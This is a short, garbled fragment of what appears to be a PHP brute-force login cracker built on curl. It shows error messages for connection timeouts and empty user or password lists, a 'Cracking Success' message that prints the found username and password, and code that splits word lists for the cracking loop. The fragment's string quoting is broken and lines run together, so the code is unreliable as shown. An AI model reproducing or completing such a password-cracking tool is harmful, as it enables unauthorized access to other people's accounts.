Error : Connection Timeout Please Check The Target Hostname .
";exit;} elseif ( curl_errno($ch) == 0 ){ print "[~] Cracking Success With Username "$user\" and Password \"$pass\"Error : Please Check The Users or Password List Entry . . .
"; exit; } if(empty($users)){ print "Error : Please Check The Users List Entry . . .
"; exit; } if(empty($pass) ){ print "Error : Please Check The Password List Entry . . .
"; exit; }; $userlist=explode("\n",$users); $passlist=explode("\n",$pass); print "[~]# Cracking Process Started, Please Wait ...